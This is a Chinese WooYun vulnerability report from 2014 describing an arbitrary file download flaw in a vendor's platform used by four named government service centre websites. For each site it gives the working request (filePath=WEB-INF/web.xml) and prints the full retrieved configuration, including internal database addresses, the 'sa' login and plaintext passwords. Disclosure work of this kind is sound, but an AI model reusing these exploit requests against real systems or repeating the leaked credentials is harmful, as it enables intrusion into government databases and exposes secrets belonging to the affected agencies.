当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054074

漏洞标题:某政府服务中心存在通用型文件包含漏洞

相关厂商:上海卓繁信息技术股份有限公司

漏洞作者: Mr.leo

提交时间:2014-03-20 10:58

修复时间:2014-06-18 10:59

公开时间:2014-06-18 10:59

漏洞类型:文件包含

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-20: 细节已通知厂商并且等待厂商处理中
2014-03-27: 厂商已经确认,细节仅向厂商公开
2014-03-30: 细节向第三方安全合作伙伴开放
2014-05-21: 细节向核心白帽子及相关领域专家公开
2014-05-31: 细节向普通白帽子公开
2014-06-10: 细节向实习白帽子公开
2014-06-18: 细节向公众公开

简要描述:

某政府服务中心存在通用型文件包含漏洞,

详细说明:

涉及到4个网站
1,http://www.whxzfw.gov.cn/index/showIndex.action 芜湖市人民政府政务服务中心

213.jpg


涉及到4个网站,可查看数据库ip地址,端口、用户名及密码。
文件包含参数filepath
文件包含地址:
www.whxzfw.gov.cn/index/downLoadFile.action?fileName=1-1%B9%AB%B9%B2%B3%A1%CB%F9%CE%C0%C9%FA%D0%ED%BF%C9%C9%EA%C7%EB%CA%E9%CA%BE%B7%B6%CE%C4%B1%BE.doc&filePath=WEB-INF/web.xml
通过下载直接获取到数据库ip地址,用户名及密码
<?xml version="1.0" encoding="UTF-8"?>
<web-app version="2.3" xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_3.xsd">
<context-param>
<param-name>dbtype</param-name>
<param-value>mssql</param-value>
</context-param>
<context-param>
<param-name>driver</param-name>
<param-value>net.sourceforge.jtds.jdbc.Driver</param-value>
</context-param>
<context-param>
<param-name>url</param-name>
<param-value>

jdbc:jtds:sqlserver://192.168.168.8:1433/webroot_wh;charset=gbk;SelectMethod=CURSOR
</param-value>
</context-param>
<context-param>
<param-name>user</param-name>
<param-value>sa</param-value>
</context-param>
<context-param>
<param-name>pass</param-name>
<param-value>9zsq4fl</param-value>
</context-param>
<context-param>
<param-name>PageRowsSmall</param-name>
<param-value>5</param-value>
</context-param>
<context-param>
<param-name>PageRowsMiddle</param-name>
<param-value>25</param-value>
</context-param>
<context-param>
<param-name>PageRowsBig</param-name>
<param-value>50</param-value>
</context-param>
<!-- oa服务url -->
<context-param>
<param-name>oa_url</param-name>
<param-value>http://www.whxzfw.gov.cn:8000/oa</param-value>
</context-param>
<!-- 审批服务url -->
<context-param>
<param-name>xzfw_url</param-name>
<param-value>http://www.whxzfw.gov.cn/xzfw</param-value>
</context-param>
<!-- 网上申报url -->
<context-param>
<param-name>xzfw_net_url</param-name>
<param-value>http://www.whxzfw.gov.cn/xzfw/netLogin.action</param-value>
</context-param>
<!-- 监察服务url -->
<context-param>
<param-name>xzjc_url</param-name>
<param-value>http://www.whxzfw.gov.cn:8000/xzjc</param-value>
</context-param>
<!-- 政务系统web服务url -->
<context-param>
<param-name>WebServiceUrl</param-name>
<param-value>http://localhost/xzfw/ApplicationDataService.jws</param-value>
</context-param>

<!-- 滚动显示n天内的办件信息 -->
<context-param>
<param-name>CaseListDateNum</param-name>
<param-value>4</param-value>
</context-param>

<context-param>
<param-name>contextConfigLocation</param-name>
<param-value>/WEB-INF/classes/global-context.xml /WEB-INF/classes/spring/*.xml</param-value>
</context-param>

<filter>
<filter-name>CharacterEncoding</filter-name>
<filter-class>com.zhuofan.util.SetCharacterEncodingFilter</filter-class>
<init-param>
<param-name>encoding</param-name>
<param-value>GBK</param-value>
</init-param>
</filter>

<filter>
<filter-name>zfZjfwdzFilter</filter-name>
<filter-class>
com.zhuofan.util.ZfZjfwdzFilter
</filter-class>
</filter>
<filter-mapping>
<filter-name>CharacterEncoding</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>

<filter-mapping>
<filter-name>zfZjfwdzFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>

<!-- webwork监听 -->
<listener>
<listener-class>com.opensymphony.webwork.lifecycle.LifecycleListener</listener-class>
</listener>
<listener>
<listener-class>com.zhuofan.auto.AutoLoadListener</listener-class>
</listener>
<listener>
<listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>
</listener>
<servlet>
<servlet-name>validation</servlet-name>
<servlet-class>
com.opensymphony.webwork.validators.ValidationServlet
</servlet-class>
</servlet>



<servlet>
<servlet-name>com.metaparadigm.jsonrpc.JSONRPCServlet</servlet-name>
<servlet-class>com.metaparadigm.jsonrpc.JSONRPCServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>com.metaparadigm.jsonrpc.JSONRPCServlet</servlet-name>
<url-pattern>/JSON-RPC</url-pattern>
</servlet-mapping>

<!-- webwork拦截转发 -->
<filter>
<filter-name>webwork</filter-name>
<filter-class>com.opensymphony.webwork.dispatcher.FilterDispatcher</filter-class>
</filter>
<filter-mapping>
<filter-name>webwork</filter-name>
<url-pattern>*.action</url-pattern>
</filter-mapping>
<listener>
<listener-class>org.apache.axis.transport.http.AxisHTTPSessionListener</listener-class>
</listener>

<filter>
<filter-name>HibernateSessionManager</filter-name>
<filter-class>com.zhuofan.util.OpenSessionInViewFilterAuto</filter-class>
</filter>
<filter-mapping>
<filter-name>HibernateSessionManager</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>

<!-- dwr -->
<servlet>
<servlet-name>dwr</servlet-name>
<display-name>DWR Servlet</display-name>
<description>Direct Web Remoter Servlet</description>
<servlet-class>uk.ltd.getahead.dwr.DWRServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>true</param-value>
</init-param>
<!-- 防止跨域调用时产生的Session Error -->
<init-param>
   <param-name>crossDomainSessionSecurity</param-name>
   <param-value>false</param-value>
   </init-param>
</servlet>
<servlet>
<servlet-name>FileDownload</servlet-name>
<display-name>This is the display name of my J2EE component</display-name>
<description>This is the description of my J2EE component</description>
<servlet-class>common.FileDownload</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>dwr</servlet-name>
<url-pattern>/dwr/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>FileDownload</servlet-name>
<url-pattern>/servlet/FileDownload</url-pattern>
</servlet-mapping>


<!-- <servlet>-->
<!-- <servlet-name>AxisServlet</servlet-name>-->
<!-- <display-name>Apache-Axis Servlet</display-name>-->
<!-- <servlet-class>org.apache.axis.transport.http.AxisServlet</servlet-class>-->
<!-- </servlet>-->
<!-- <servlet-mapping>-->
<!-- <servlet-name>AxisServlet</servlet-name>-->
<!-- <url-pattern>*.jws</url-pattern>-->
<!-- </servlet-mapping>-->
<!---->
<!-- <mime-mapping>-->
<!-- <extension>wsdl</extension>-->
<!-- <mime-type>text/xml</mime-type>-->
<!-- </mime-mapping>-->
<!-- -->
<!-- <mime-mapping>-->
<!-- <extension>xsd</extension>-->
<!-- <mime-type>text/xml</mime-type>-->
<!-- </mime-mapping>-->
<welcome-file-list>
<welcome-file>index.html</welcome-file>
<welcome-file>index.jsp</welcome-file>
<welcome-file>default.jsp</welcome-file>
</welcome-file-list>
<taglib>
<taglib-uri>webwork</taglib-uri>
<taglib-location>/WEB-INF/webwork.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>benchmark</taglib-uri>
<taglib-location>
/WEB-INF/taglibs-benchmark.tld
</taglib-location>
</taglib>
<taglib>
<taglib-uri>c</taglib-uri>
<taglib-location>/WEB-INF/c.tld</taglib-location>
</taglib>

</web-app>
2、http://www.hbxzzx.gov.cn/index/showIndex.action 淮北市人民政府政务服务中心
文件包含参数一样是filepath
www.hbxzzx.gov.cn/index/downLoadFile.action?filePath=WEB-INF/web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app version="2.3" xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_3.xsd">
<context-param>
<param-name>dbtype</param-name>
<param-value>mssql</param-value>
</context-param>
<context-param>
<param-name>driver</param-name>
<param-value>net.sourceforge.jtds.jdbc.Driver</param-value>
</context-param>
<context-param>
<param-name>url</param-name>
<param-value>
jdbc:jtds:sqlserver://192.168.0.252:1433/hb_web;charset=gbk;SelectMethod=CURSOR
</param-value>
</context-param>
<context-param>
<param-name>user</param-name>
<param-value>sa</param-value>
</context-param>
<context-param>
<param-name>pass</param-name>
<param-value>hbxzzxywk7516</param-value>
</context-param>
<!--
<context-param>
<param-name>dbtype</param-name>
<param-value>oracle</param-value>
</context-param>
<context-param>
<param-name>driver</param-name>
<param-value>oracle.jdbc.driver.OracleDriver</param-value>
</context-param>
<context-param>
<param-name>url</param-name>
<param-value>jdbc:oracle:thin:@192.168.0.47:1521:fstest</param-value>
</context-param>
<context-param>
<param-name>user</param-name>
<param-value>web</param-value>
</context-param>
<context-param>
<param-name>pass</param-name>
<param-value>web</param-value>
</context-param>
-->
<context-param>
<param-name>PageRowsSmall</param-name>
<param-value>6</param-value>
</context-param>
<context-param>
<param-name>PageRowsMiddle</param-name>
<param-value>20</param-value>
</context-param>
<context-param>
<param-name>PageRowsBig</param-name>
<param-value>50</param-value>
</context-param>

<!-- 政务系统web服务url -->
<context-param>
<param-name>WebServiceUrl</param-name>
<param-value>http://192.168.0.31:8080/xzfw_yidu_ok/ApplicationDataService.jws</param-value>
</context-param>

<!-- 滚动显示n天内的办件信息 -->
<context-param>
<param-name>CaseListDateNum</param-name>
<param-value>2</param-value>
</context-param>

<context-param>
<param-name>contextConfigLocation</param-name>
<param-value>/WEB-INF/classes/global-context.xml /WEB-INF/classes/spring/*.xml /WEB-INF/classes/xfire_quartz.xml</param-value>
</context-param>
<filter>
<filter-name>container</filter-name>
<filter-class>
com.opensymphony.webwork.lifecycle.RequestLifecycleFilter
</filter-class>
</filter>

<filter>
<filter-name>CharacterEncoding</filter-name>
<filter-class>com.zhuofan.util.SetCharacterEncodingFilter</filter-class>
<init-param>
<param-name>encoding</param-name>
<param-value>GB2312</param-value>
</init-param>
</filter>

<filter>
<filter-name>HibernateSessionManager</filter-name>
<filter-class>com.zhuofan.util.OpenSessionInViewFilterAuto</filter-class>
</filter>

<filter-mapping>
<filter-name>HibernateSessionManager</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>

<filter-mapping>
<filter-name>container</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>CharacterEncoding</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<listener>
<listener-class>
com.opensymphony.webwork.lifecycle.ApplicationLifecycleListener
</listener-class>
</listener>
<listener>
<listener-class>
com.opensymphony.webwork.lifecycle.SessionLifecycleListener
</listener-class>
</listener>
<servlet>
<servlet-name>webwork</servlet-name>
<servlet-class>
com.opensymphony.webwork.dispatcher.ServletDispatcher
</servlet-class>
</servlet>
<servlet>
<servlet-name>validation</servlet-name>
<servlet-class>
com.opensymphony.webwork.validators.ValidationServlet
</servlet-class>
</servlet>
<servlet>
<servlet-name>autoload</servlet-name>
<servlet-class>com.zhuofan.auto.AutoLoad</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>

<servlet>
<servlet-name>SpringContextServlet</servlet-name>
<servlet-class>
org.springframework.web.context.ContextLoaderServlet
</servlet-class>
<load-on-startup>2</load-on-startup>
</servlet>
<servlet>
<servlet-name>com.metaparadigm.jsonrpc.JSONRPCServlet</servlet-name>
<servlet-class>com.metaparadigm.jsonrpc.JSONRPCServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>com.metaparadigm.jsonrpc.JSONRPCServlet</servlet-name>
<url-pattern>/JSON-RPC</url-pattern>
</servlet-mapping>

<servlet-mapping>
<servlet-name>webwork</servlet-name>
<url-pattern>*.action</url-pattern>
</servlet-mapping>
<listener>
<listener-class>org.apache.axis.transport.http.AxisHTTPSessionListener</listener-class>
</listener>

<servlet>
<servlet-name>AxisServlet</servlet-name>
<display-name>Apache-Axis Servlet</display-name>
<servlet-class>org.apache.axis.transport.http.AxisServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>AxisServlet</servlet-name>
<url-pattern>*.jws</url-pattern>
</servlet-mapping>
<mime-mapping>
<extension>wsdl</extension>
<mime-type>text/xml</mime-type>
</mime-mapping>

<mime-mapping>
<extension>xsd</extension>
<mime-type>text/xml</mime-type>
</mime-mapping>
<welcome-file-list>
<welcome-file>index.html</welcome-file>
<welcome-file>index.jsp</welcome-file>
<welcome-file>default.jsp</welcome-file>
</welcome-file-list>
<taglib>
<taglib-uri>webwork</taglib-uri>
<taglib-location>/WEB-INF/webwork.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>benchmark</taglib-uri>
<taglib-location>
/WEB-INF/taglibs-benchmark.tld
</taglib-location>
</taglib>
<taglib>
<taglib-uri>c</taglib-uri>
<taglib-location>/WEB-INF/c.tld</taglib-location>
</taglib>
<filter>
<filter-name>zfZjfwdzFilter</filter-name>
<filter-class>
com.zhuofan.util.ZfZjfwdzFilter
</filter-class>
</filter>
<filter-mapping>
<filter-name>zfZjfwdzFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
</web-app>
3、http://www.xfxzfw.gov.cn:8080/index/showIndex.action 襄阳市行政服务中心
文件包含参数filepath
文件包含地址:

http://www.xfxzfw.gov.cn:8080/index/downLoadFile.action?fileName=&filePath=WEB-INF/web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app version="2.3" xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_3.xsd">
<context-param>
<param-name>dbtype</param-name>
<param-value>mssql</param-value>
</context-param>
<context-param>
<param-name>driver</param-name>
<param-value>net.sourceforge.jtds.jdbc.Driver</param-value>
</context-param>
<!-- <context-param>
<param-name>url</param-name>
<param-value>
jdbc:jtds:sqlserver://127.0.0.1:1433/web_xf;charset=gbk;SelectMethod=CURSOR
</param-value>
</context-param>
-->

<context-param>
<param-name>url</param-name>
<param-value>
jdbc:jtds:sqlserver://127.0.0.1:1433/web_xf;charset=gbk;SelectMethod=CURSOR
</param-value>
</context-param>


<context-param>
<param-name>user</param-name>
<param-value>sa</param-value>
</context-param>
<context-param>
<param-name>pass</param-name>
<param-value>wx0okm</param-value>
</context-param>
<context-param>
<param-name>PageRowsSmall</param-name>
<param-value>5</param-value>
</context-param>
<context-param>
<param-name>PageRowsMiddle</param-name>
<param-value>20</param-value>
</context-param>
<context-param>
<param-name>PageRowsBig</param-name>
<param-value>50</param-value>
</context-param>

<!-- 政务系统web服务url -->
<context-param>
<param-name>WebServiceUrl</param-name>
<param-value>http://119.36.79.214:8080/xzfw/ApplicationDataService.jws</param-value>
</context-param>

<!-- 联审联办工作平台url -->
<context-param>
<param-name>xzfwUrl</param-name>
<param-value>http://219.139.28.8:8880/ybgy</param-value>
</context-param>

<!-- 滚动显示n天内的办件信息 -->
<context-param>
<param-name>CaseListDateNum</param-name>
<param-value>4</param-value>
</context-param>
<context-param>
<param-name>WorkFlowURL</param-name> <param-value>http://119.36.79.214:8080/xzfw/staticBLWorkFlow.action?caseid=&amp;workflowid=</param-value>
</context-param>
<context-param>
<param-name>contextConfigLocation</param-name>
<param-value>/WEB-INF/classes/global-context.xml /WEB-INF/classes/spring/*.xml</param-value>
</context-param>
<filter>
<filter-name>container</filter-name>
<filter-class>
com.opensymphony.webwork.lifecycle.RequestLifecycleFilter
</filter-class>
</filter>

<filter>
<filter-name>CharacterEncoding</filter-name>
<filter-class>com.zhuofan.util.SetCharacterEncodingFilter</filter-class>
<init-param>
<param-name>encoding</param-name>
<param-value>GB2312</param-value>
</init-param>
</filter>

<filter-mapping>
<filter-name>container</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>CharacterEncoding</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<listener>
<listener-class>
com.opensymphony.webwork.lifecycle.ApplicationLifecycleListener
</listener-class>
</listener>
<listener>
<listener-class>
com.opensymphony.webwork.lifecycle.SessionLifecycleListener
</listener-class>
</listener>
<servlet>
<servlet-name>webwork</servlet-name>
<servlet-class>
com.opensymphony.webwork.dispatcher.ServletDispatcher
</servlet-class>
</servlet>
<servlet>
<servlet-name>validation</servlet-name>
<servlet-class>
com.opensymphony.webwork.validators.ValidationServlet
</servlet-class>
</servlet>
<servlet>
<servlet-name>autoload</servlet-name>
<servlet-class>com.zhuofan.auto.AutoLoad</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>

<servlet>
<servlet-name>SpringContextServlet</servlet-name>
<servlet-class>
org.springframework.web.context.ContextLoaderServlet
</servlet-class>
<load-on-startup>2</load-on-startup>
</servlet>
<servlet>
<servlet-name>com.metaparadigm.jsonrpc.JSONRPCServlet</servlet-name>
<servlet-class>com.metaparadigm.jsonrpc.JSONRPCServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>FileDownload</servlet-name>
<display-name>This is the display name of my J2EE component</display-name>
<description>This is the description of my J2EE component</description>
<servlet-class>common.FileDownload</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>com.metaparadigm.jsonrpc.JSONRPCServlet</servlet-name>
<url-pattern>/JSON-RPC</url-pattern>
</servlet-mapping>

<servlet-mapping>
<servlet-name>webwork</servlet-name>
<url-pattern>*.action</url-pattern>
</servlet-mapping>
<listener>
<listener-class>org.apache.axis.transport.http.AxisHTTPSessionListener</listener-class>
</listener>

<!-- <servlet>-->
<!-- <servlet-name>AxisServlet</servlet-name>-->
<!-- <display-name>Apache-Axis Servlet</display-name>-->
<!-- <servlet-class>org.apache.axis.transport.http.AxisServlet</servlet-class>-->
<!-- </servlet>-->
<!-- <servlet-mapping>-->
<!-- <servlet-name>AxisServlet</servlet-name>-->
<!-- <url-pattern>*.jws</url-pattern>-->
<!-- </servlet-mapping>-->
<!---->
<!-- <mime-mapping>-->
<!-- <extension>wsdl</extension>-->
<!-- <mime-type>text/xml</mime-type>-->
<!-- </mime-mapping>-->
<!-- -->
<!-- <mime-mapping>-->
<!-- <extension>xsd</extension>-->
<!-- <mime-type>text/xml</mime-type>-->
<!-- </mime-mapping>-->

<filter>
<filter-name>zfZjfwdzFilter</filter-name>
<filter-class>
com.zhuofan.util.ZfZjfwdzFilter
</filter-class>
</filter>
<filter-mapping>
<filter-name>zfZjfwdzFilter</filter-name>
<url-pattern>/admin/*</url-pattern>
</filter-mapping>



<welcome-file-list>
<welcome-file>index.html</welcome-file>
<welcome-file>index.jsp</welcome-file>
<welcome-file>default.jsp</welcome-file>
</welcome-file-list>
<taglib>
<taglib-uri>webwork</taglib-uri>
<taglib-location>/WEB-INF/webwork.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>benchmark</taglib-uri>
<taglib-location>
/WEB-INF/taglibs-benchmark.tld
</taglib-location>
</taglib>
<taglib>
<taglib-uri>c</taglib-uri>
<taglib-location>/WEB-INF/c.tld</taglib-location>
</taglib>

</web-app>
4、http://110.7.48.79:8081/index/showIndex.action 阿尔山行政中心
http://110.7.48.79:8081/index/downLoadFile.action?fileName=&filePath=WEB-INF/web.xml

同样是filepath这个参数

<?xml version="1.0" encoding="UTF-8"?>
<web-app version="2.3" xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_3.xsd">
<context-param>
<param-name>dbtype</param-name>
<param-value>mssql</param-value>
</context-param>
<context-param>
<param-name>driver</param-name>
<param-value>net.sourceforge.jtds.jdbc.Driver</param-value>
</context-param>
<context-param>
<param-name>url</param-name>
<param-value>
jdbc:jtds:sqlserver://192.168.1.2:1433/xzfwweb;charset=gbk;SelectMethod=CURSOR
</param-value>
</context-param>
<context-param>
<param-name>user</param-name>
<param-value>sa</param-value>
</context-param>
<context-param>
<param-name>pass</param-name>
<param-value>zhongxin001</param-value>
</context-param>
<context-param>
<param-name>PageRowsSmall</param-name>
<param-value>6</param-value>
</context-param>
<context-param>
<param-name>PageRowsMiddle</param-name>
<param-value>20</param-value>
</context-param>
<context-param>
<param-name>PageRowsBig</param-name>
<param-value>50</param-value>
</context-param>

<!-- 政务系统web服务url -->
<context-param>
<param-name>WebServiceUrl</param-name>
<param-value>http://localhost/xzfw/ApplicationDataService.jws</param-value>
</context-param>

<!-- 滚动显示n天内的办件信息 -->
<context-param>
<param-name>CaseListDateNum</param-name>
<param-value>4</param-value>
</context-param>

<context-param>
<param-name>contextConfigLocation</param-name>
<param-value>/WEB-INF/classes/global-context.xml /WEB-INF/classes/spring/*.xml</param-value>
</context-param>
<filter>
<filter-name>container</filter-name>
<filter-class>
com.opensymphony.webwork.lifecycle.RequestLifecycleFilter
</filter-class>
</filter>

<filter>
<filter-name>CharacterEncoding</filter-name>
<filter-class>com.zhuofan.util.SetCharacterEncodingFilter</filter-class>
<init-param>
<param-name>encoding</param-name>
<param-value>GBK</param-value>
</init-param>
</filter>

<filter-mapping>
<filter-name>container</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>CharacterEncoding</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<listener>
<listener-class>
com.opensymphony.webwork.lifecycle.ApplicationLifecycleListener
</listener-class>
</listener>
<listener>
<listener-class>
com.opensymphony.webwork.lifecycle.SessionLifecycleListener
</listener-class>
</listener>
<servlet>
<servlet-name>webwork</servlet-name>
<servlet-class>
com.opensymphony.webwork.dispatcher.ServletDispatcher
</servlet-class>
</servlet>
<servlet>
<servlet-name>validation</servlet-name>
<servlet-class>
com.opensymphony.webwork.validators.ValidationServlet
</servlet-class>
</servlet>
<servlet>
<servlet-name>autoload</servlet-name>
<servlet-class>com.zhuofan.auto.AutoLoad</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>

<servlet>
<servlet-name>SpringContextServlet</servlet-name>
<servlet-class>
org.springframework.web.context.ContextLoaderServlet
</servlet-class>
<load-on-startup>2</load-on-startup>
</servlet>
<servlet>
<servlet-name>com.metaparadigm.jsonrpc.JSONRPCServlet</servlet-name>
<servlet-class>com.metaparadigm.jsonrpc.JSONRPCServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>com.metaparadigm.jsonrpc.JSONRPCServlet</servlet-name>
<url-pattern>/JSON-RPC</url-pattern>
</servlet-mapping>

<servlet-mapping>
<servlet-name>webwork</servlet-name>
<url-pattern>*.action</url-pattern>
</servlet-mapping>
<listener>
<listener-class>org.apache.axis.transport.http.AxisHTTPSessionListener</listener-class>
</listener>

<!-- <servlet>-->
<!-- <servlet-name>AxisServlet</servlet-name>-->
<!-- <display-name>Apache-Axis Servlet</display-name>-->
<!-- <servlet-class>org.apache.axis.transport.http.AxisServlet</servlet-class>-->
<!-- </servlet>-->
<!-- <servlet-mapping>-->
<!-- <servlet-name>AxisServlet</servlet-name>-->
<!-- <url-pattern>*.jws</url-pattern>-->
<!-- </servlet-mapping>-->
<!---->
<!-- <mime-mapping>-->
<!-- <extension>wsdl</extension>-->
<!-- <mime-type>text/xml</mime-type>-->
<!-- </mime-mapping>-->
<!-- -->
<!-- <mime-mapping>-->
<!-- <extension>xsd</extension>-->
<!-- <mime-type>text/xml</mime-type>-->
<!-- </mime-mapping>-->
<welcome-file-list>
<welcome-file>index.html</welcome-file>
<welcome-file>index.jsp</welcome-file>
<welcome-file>default.jsp</welcome-file>
</welcome-file-list>
<taglib>
<taglib-uri>webwork</taglib-uri>
<taglib-location>/WEB-INF/webwork.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>benchmark</taglib-uri>
<taglib-location>
/WEB-INF/taglibs-benchmark.tld
</taglib-location>
</taglib>
<taglib>
<taglib-uri>c</taglib-uri>
<taglib-location>/WEB-INF/c.tld</taglib-location>
</taglib>

</web-app>

漏洞证明:

已经证明

修复方案:

版权声明:转载请注明来源 Mr.leo@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2014-03-27 22:12

厂商回复:

CNVD确认并复现所述实例情况,由CNVD通过公开联系渠道联系软件生产厂商——上海卓繁公司,向其通报漏洞情况,并已经转由CNCERT下发给对应分中心处置相关地方政府部门案例。

最新状态:

暂无